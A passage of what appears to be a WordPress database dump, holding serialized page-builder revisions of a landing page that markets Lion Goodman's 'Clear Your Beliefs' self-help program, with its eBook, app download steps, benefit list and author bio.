[/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(984, 1496, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:436:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="121" height="180" />\n\n[Form id="10"]\n\n<a href="#"><img class="aligncenter size-full wp-image-1486" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_11.png" alt="btn_11" width="225" height="60" /></a>\n</center>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(985, 1497, '_wp_attached_file', '2014/10/get-access.jpg'),
(986, 1497, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:204;s:6:"height";i:54;s:4:"file";s:22:"2014/10/get-access.jpg";s:5:"sizes";a:2:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"get-access-150x54.jpg";s:5:"width";i:150;s:6:"height";i:54;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:21:"get-access-170x54.jpg";s:5:"width";i:170;s:6:"height";i:54;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(987, 1497, '_edit_lock', '1412750604:2'),
(989, 1499, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:273:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><p>[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:766:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></p><p style="text-align: center;"><strong>DOWNLOAD THE <br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(990, 1500, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:286:"<p>[su_box title="Step 1" box_color="#1a2d8c" radius="8"]</p><p>style="margin-left: 41px;"&gt;<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"]<br /> [/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:805:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><span style="margin-left: 60px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></span></p><p style="text-align: center;"><strong>DOWNLOAD THE<br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" 